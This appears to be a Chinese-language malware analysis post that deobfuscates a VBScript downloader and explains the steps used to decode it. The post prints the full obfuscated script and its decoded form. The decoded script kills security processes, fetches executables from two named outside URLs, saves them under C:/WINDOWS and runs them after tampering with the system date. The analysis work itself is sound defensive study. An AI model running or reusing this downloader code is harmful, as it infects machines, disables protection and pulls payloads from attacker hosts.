解密一个VBS下载者

原代码：

UgiuihuiYUG="execute>>P<>next<

>>>P<<>>P<<>>P<<>>P<<>>P<<>>P<<>>P<<>>P<>for>>P<>P<>P<>strs=array(575784,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,83,101,116,32,107,106,74,73,104,117,111,73,74,73,111,85,73,121,117,117,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,101,116,32,100,101,103,121,73,84,54,71,89,55,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41,13,10,83,101,116,32,103,121,117,71,89,85,103,121,117,89,71,85,103,117,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41,13,10,72,84,84,80,61,34,104,116,116,112,58,34,13,10,72,84,80,80,61,34,47,47,34,13,10,72,84,80,84,61,34,37,54,34,13,10,107,106,74,73,104,117,111,73,61,34,37,51,48,34,13,10,107,106,74,108,104,117,111,73,61,34,37,51,50,34,13,10,102,111,114,32,101,97,99,104,32,112,115,32,105,110,32,103,101,116,111,98,106,101,99,116,40,34,119,105,110,109,103,109,116,115,58,92,92,46,92,114,111,111,116,92,99,105,109,118,50,58,119,105,110,51,50,95,112,114,111,99,101,115,115,34,41,46,105,110,115,116,97,110,99,101,115,95,13,10,105,102,32,112,115,46,78,97,109,101,61,34,114,102,119,115,114,118,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,49,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,50,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,51,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,65,89,85,112,100,97,116,101,46,97,121,101,34,116,104,101,110,32,13,10,107,106,74,73,104,117,111,73,74,73,111,85,73,121,117,117,46,114,117,110,32,34,110,116,115,100,32,45,112,32,34,43,99,115,116,114,40,43,112,115,46,104,97,110,100,108,101,41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110,100,32,105,102,13,10,110,101,120,116,13,10,107,106,74,73,104,117,111,108,61,34,53,37,34,13,10,103,117,121,71,89,85,103,117,121,89,71,85,103,117,61,34,68,34,43,72,84,80,84,43,34,49,34,43,72,84,80,84,43,34,67,34,43,72,84,80,84,43,34,67,37,50,69,34,43,72,84,80,84,13,10,103,121,117,71,89,85,103,117,121,89,71,85,103,117,61,34,69,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,55,37,50,69,34,43,72,84,80,84,43,34,54,34,43,72,84,80,84,43,34,57,37,55,50,37,55,51,37,55,52,34,43,72,84,80,84,13,10,107,73,74,73,104,117,111,108,61,34,69,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,50,47,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,51,34,43,72,84,80,84,13,10,72,74,78,106,105,104,55,103,72,61,34,53,34,43,72,84,80,84,43,34,67,34,43,72,84,80,84,43,34,67,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,50,37,55,51,47,37,55,52,34,43,72,84,80,84,13,10,110,120,114,116,61,72,84,80,84,43,34,65,34,43,72,84,80,84,43,34,65,34,43,72,84,80,84,43,34,66,34,43,72,84,80,84,13,10,110,114,122,116,61,72,84,84,80,43,72,84,80,80,13,10,107,106,74,108,104,110,111,73,61,34,68,37,55,48,47,34,43,107,106,74,108,104,117,111,73,43,107,106,74,73,104,117,111,73,43,107,106,74,73,104,117,111,73,43,34,37,51,56,37,51,49,34,43,107,106,74,73,104,117,111,73,13,10,100,101,103,121,108,84,54,71,89,55,61,34,66,37,55,50,47,37,55,48,34,43,72,84,80,84,43,34,49,37,55,50,37,55,52,34,43,72,84,80,84,13,10,103,121,117,71,89,85,103,121,117,89,71,85,103,117,46,79,112,101,110,32,34,71,69,84,34,44,110,114,122,116,43,110,120,114,116,43,103,121,117,71,89,85,103,117,121,89,71,85,103,117,43,103,117,121,71,89,85,103,117,121,89,71,85,103,117,43,100,101,103,121,108,84,54,71,89,55,43,107,73,74,73,104,117,111,108,43,72,74,78,106,105,104,55,103,72,43,107,106,74,108,104,110,111,73,43,107,106,74,73,104,117,111,73,43,107,106,74,108,104,117,111,73,43,34,37,51,49,37,51,54,37,51,52,37,51,56,34,43,72,84,80,84,43,34,50,37,51,55,37,53,70,34,43,107,106,74,108,104,117,111,73,44,48,13,10,103,121,117,71,89,85,103,121,117,89,71,85,103,117,46,83,101,110,100,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100,101,103,121,73,84,54,71,89,55,46,84,121,112,101,61,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,87,114,105,116,101,40,103,121,117,71,89,85,103,121,117,89,71,85,103,117,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101,32,34,67,58,92,87,73,78,68,79,87,83,92,105,110,102,92,97,119,103,46,101,120,101,34,13,10,107,106,74,73,104,117,111,73,74,73,111,85,73,121,117,117,46,114,117,110,32,40,34,99,109,100,32,47,99,32,115,101,116,32,100,97,116,101,61,37,100,97,116,101,37,32,38,38,100,97,116,101,32,50,48,48,56,45,52,45,49,32,38,38,112,105,110,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73,78,68,79,87,83,92,105,110,102,92,97,119,103,46,101,120,101,32,38,38,100,97,116,101,32,37,100,97,116,101,37,32,34,41,44,48,13,10,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,72,74,85,61,34,37,54,65,34,13,10,65,55,61,34,37,55,34,13,10,65,54,70,54,67,54,67,54,53,54,55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52,51,50,51,56,51,50,51,54,51,53,51,55,61,34,104,116,116,112,58,47,47,34,13,10,83,101,116,32,72,74,85,106,105,104,55,103,72,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,101,116,32,100,101,103,121,73,84,54,71,89,55,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41,13,10,83,101,116,32,85,72,85,111,111,117,104,56,57,72,57,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41,13,10,102,111,114,32,101,97,99,104,32,112,115,32,105,110,32,103,101,116,111,98,106,101,99,116,40,34,119,105,110,109,103,109,116,115,58,92,92,46,92,114,111,111,116,92,99,105,109,118,50,58,119,105,110,51,50,95,112,114,111,99,101,115,115,34,41,46,105,110,115,116,97,110,99,101,115,95,13,10,105,102,32,112,115,46,78,97,109,101,61,34,114,102,119,115,114,118,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,49,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,50,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,51,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,65,89,85,112,100,97,116,101,46,97,121,101,34,116,104,101,110,32,13,10,72,74,85,106,105,104,55,103,72,46,114,117,110,32,34,110,116,115,100,32,45,112,32,34,43,99,115,116,114,40,43,112,115,46,104,97,110,100,108,101,41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110,100,32,105,102,13,10,110,101,120,116,13,10,85,72,85,111,111,117,104,56,57,72,57,46,79,112,101,110,32,34,71,69,84,34,44,65,54,70,54,67,54,67,54,53,54,55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52,51,50,51,56,51,50,51,54,51,53,51,55,43,65,55,43,34,55,34,43,65,55,43,34,55,34,43,65,55,43,34,55,34,43,34,37,50,69,37,54,51,37,54,55,37,54,50,34,43,65,55,43,34,51,37,50,69,34,43,72,74,85,43,65,55,43,34,48,47,34,43,34,37,54,56,37,54,70,37,54,68,37,54,53,47,37,54,57,37,54,68,37,54,49,37,54,55,37,54,53,34,43,65,55,43,34,51,47,37,54,50,37,54,49,37,54,69,37,54,69,37,54,53,34,43,65,55,43,34,50,34,43,65,55,43,34,51,47,34,43,65,55,43,34,48,37,54,70,34,43,65,55,43,34,50,34,43,65,55,43,34,52,37,54,54,37,54,70,37,54,67,37,54,57,37,54,70,34,43,34,66,34,43,34,37,51,49,37,51,48,37,51,56,37,51,56,34,43,34,46,34,43,72,74,85,43,65,55,43,34,48,37,54,55,34,44,48,13,10,85,72,85,111,111,117,104,56,57,72,57,46,83,101,110,100,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100,101,103,121,73,84,54,71,89,55,46,84,121,112,101,61,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,87,114,105,116,101,40,85,72,85,111,111,117,104,56,57,72,57,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101,32,34,67,58,92,87,73,78,68,79,87,83,92,97,100,100,105,110,115,92,111,116,46,101,120,101,34,13,10,72,74,85,106,105,104,55,103,72,46,114,117,110,32,40,34,99,109,100,32,47,99,32,115,101,116,32,100,97,116,101,61,37,100,97,116,101,37,32,38,38,100,97,116,101,32,50,48,48,57,45,55,45,49,32,38,38,112,105,110,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73,78,68,79,87,83,92,97,100,100,105,110,115,92,111,116,46,101,120,101,32,38,38,100,97,116,101,32,37,100,97,116,101,37,32,34,41,44,48,13,10)<

>"
UgiuihuiYUG = Replace(UgiuihuiYUG, ">>P<<",chr(9))
UgiuihuiYUG = Replace(UgiuihuiYUG, "ΰ", chr(34))
UgiuihuiYUG = Replace(UgiuihuiYUG, "Ǯ", chr(39))
execute(MyEncode(UgiuihuiYUG))
function MyEncode(hack520org)
sz = Split(hack520org, "<

>")
For i = UBound(sz) To 0 Step -1
weiwei = weiwei + sz(i) + vbcrlf
Next
MyEncode=weiwei
end function

加入代码

Sub Intercept (ee)
WScript.Echo ee
OutPutFile="decode_1.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write ee
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub

替换第一个execute为Intercept，执行：

得到代码：

on error resume next
Set kjJIhuoIJIoUIyuu=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
Set gyuGYUgyuYGUgu = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p")
HTTP="http:"
HTPP="//"
HTPT="%6"
kjJIhuoI="%30"
kjJlhuoI="%32"
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
kjJIhuoIJIoUIyuu.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
kjJIhuol="5%"
guyGYUguyYGUgu="D"+HTPT+"1"+HTPT+"C"+HTPT+"C%2E"+HTPT
gyuGYUguyYGUgu="E"+HTPT+kjJIhuol+"77%2E"+HTPT+"6"+HTPT+"9%72%73%74"+HTPT
kIJIhuol="E"+HTPT+kjJIhuol+"72/"+HTPT+kjJIhuol+"73"+HTPT
HJNjih7gH="5"+HTPT+"C"+HTPT+"C"+HTPT+kjJIhuol+"72%73/%74"+HTPT
nxrt=HTPT+"A"+HTPT+"A"+HTPT+"B"+HTPT
nrzt=HTTP+HTPP
kjJlhnoI="D%70/"+kjJlhuoI+kjJIhuoI+kjJIhuoI+"%38%31"+kjJIhuoI
degylT6GY7="B%72/%70"+HTPT+"1%72%74"+HTPT
gyuGYUgyuYGUgu.Open "GET",nrzt+nxrt+gyuGYUguyYGUgu+guyGYUguyYGUgu+degylT6GY7+kIJIhuol+HJNjih7gH+kjJlhnoI+kjJIhuoI+kjJlhuoI+"%31%36%34%38"+HTPT+"2%37%5F"+kjJlhuoI,0
gyuGYUgyuYGUgu.Send()
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(gyuGYUgyuYGUgu.responseBody)
degyIT6GY7.sAVetOFiLe "C:/WINDOWS/inf/awg.exe"
kjJIhuoIJIoUIyuu.run ("cmd /c set date=%date% &&date 2008-4-1 &&ping -n 10 127.0.0.1 &&start C:/WINDOWS/inf/awg.exe &&date %date% "),0
on error resume next
HJU="%6A"
A7="%7"
A6F6C6C6567652E6FA764313134323832363537="http://"
Set HJUjih7gH=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
Set UHUoouh89H9 = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p")
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
HJUjih7gH.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
UHUoouh89H9.Open "GET",A6F6C6C6567652E6FA764313134323832363537+A7+"7"+A7+"7"+A7+"7"+"%2E%63%67%62"+A7+"3%2E"+HJU+A7+"0/"+"%68%6F%6D%65/%69%6D%61%67%65"+A7+"3/%62%61%6E%6E%65"+A7+"2"+A7+"3/"+A7+"0%6F"+A7+"2"+A7+"4%66%6F%6C%69%6F"+"B"+"%31%30%38%38"+"."+HJU+A7+"0%67",0
UHUoouh89H9.Send()
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(UHUoouh89H9.responseBody)
degyIT6GY7.sAVetOFiLe "C:/WINDOWS/addins/ot.exe"
HJUjih7gH.run ("cmd /c set date=%date% &&date 2009-7-1 &&ping -n 10 127.0.0.1 &&start C:/WINDOWS/addins/ot.exe &&date %date% "),0

替换关键代码：如*.open为msgbox显示下载路径：

msgbox(nrzt+nxrt+gyuGYUguyYGUgu+guyGYUguyYGUgu+degylT6GY7+kIJIhuol+HJNjih7gH+kjJlhnoI+kjJIhuoI+kjJlhuoI+"%31%36%34%38"+HTPT+"2%37%5F"+kjJlhuoI)

msgbox(A6F6C6C6567652E6FA764313134323832363537+A7+"7"+A7+"7"+A7+"7"+"%2E%63%67%62"+A7+"3%2E"+HJU+A7+"0/"+"%68%6F%6D%65/%69%6D%61%67%65"+A7+"3/%62%61%6E%6E%65"+A7+"2"+A7+"3/"+A7+"0%6F"+A7+"2"+A7+"4%66%6F%6C%69%6F"+"B"+"%31%30%38%38"+"."+HJU+A7+"0%67")

显示出来的东西为：

http://%6A%6A%6B%6E%65%77%2E%66%69%72%73%74%6D%61%6C%6C%2E%6B%72/%70%61%72%74%6E%65%72/%65%73%65%6C%6C%65%72%73/%74%6D%70/%32%30%30%38%31%30%30%32%31%36%34%38%62%37%5F%32

http://%77%77%77%2E%63%67%62%73%2E%6A%70/%68%6F%6D%65/%69%6D%61%67%65%73/%62%61%6E%6E%65%72%73/%70%6F%72%74%66%6F%6C%69%6FB%31%30%38%38.%6A%70%67

Redoce解密：

http://jjknew.firstmall.kr/partner/esellers/tmp/200810021648b7_2

http://www.cgbs.jp/home/images/banners/portfolioB1088.jpg

 

更简单的方法：

直接在源代码前面加上：

最后修改第一个execute为alert。修改原文件名为1.html运行并允许弹出的内容即可。